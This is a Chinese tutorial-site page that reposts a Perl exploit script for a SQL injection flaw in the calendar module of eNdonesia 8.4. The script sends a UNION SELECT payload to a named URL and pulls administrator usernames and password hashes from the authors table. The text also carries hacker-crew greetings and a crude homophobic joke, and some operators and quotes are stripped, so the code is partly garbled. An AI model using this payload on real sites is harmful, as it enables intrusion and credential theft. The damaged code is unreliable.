手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
摘要:#!/usr/bin/perl#/-----------------------------------------------#|/---...

#!/usr/bin/perl

#/-----------------------------------------------

#| /----------------------------------------- |

#| | Remote SQL Exploit | |

#| | eNdonesia 8.4 Remote SQL Exploit | |

#| | | |

#| | Calendar Module | |

#| -----------------------------------------/ |

#| /----------------------------------------- |

#| | Presented By Jack | |

#| | MainHack Enterprise | |

#| | & | |

#| | #MainHack #nob0dy #BaliemHackerlink | |

#| | Jack[at]MainHack[dot]com | |

#| -----------------------------------------/ |

#| /----------------------------------------- |

#| | Hello To: Indonesian h4x0r | |

#| | yadoy666,n0c0py & okedeh | |

#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |

#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |

#| | all MainHack BrotherHood | |

#| -----------------------------------------/ |

#-----------------------------------------------/

use HTTP::Request;

use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=calendar&op=list_events

$sql_injection = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";

if(!@ARGV) { exit(1);}

sub help(){

print "n [?] eNdonesia 8.4 Remote SQL Exploitn";

print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";

print " [?] Use : perl $0 n";

print " [?] Dont use ""n";

print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";

print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood nn";

print " [?] nn";

}

while (){

my $target = $ARGV[0];

my $exploit = "".$target.$sql_vulnerable.$sql_injection;

print "n [-] Trying to inject $target ...nn";

my $request = HTTP::Request-new(GET=$exploit);

my $useragent = LWP::UserAgent-

$useragent-timeout(10);

my $response = $useragent-request($request);

if ($response-is_success){

my $res = $response-

if ($res =~ m/([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {

my ($username,$passwd) = ($1,$2);

print " [target] $target n";

print " [loginx] $username:$passwd nn";

exit(0);

}

else {

die " [error] Fail to get username and password.nn";

}

}

else {

die " [error] Fail to inject $target nn";

}

}

#/----------------------------------------------------------------

#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |

#| namun mari kita perhatikan secara seksama ... |

#| NoGay merupakan kependekan dari NoGe is Gay. |

#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |

#----------------------------------------------------------------/

#Vendor Has been contacted and now working for it.

【eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit】相关文章:

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

Win8电脑安全软件兼容性测试

防止黑客入侵系统建立很难发现的隐藏帐户

QQ电脑管家怎么卸载

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

九种突破IDS入侵检测系统的实用方法

精品推荐
分类导航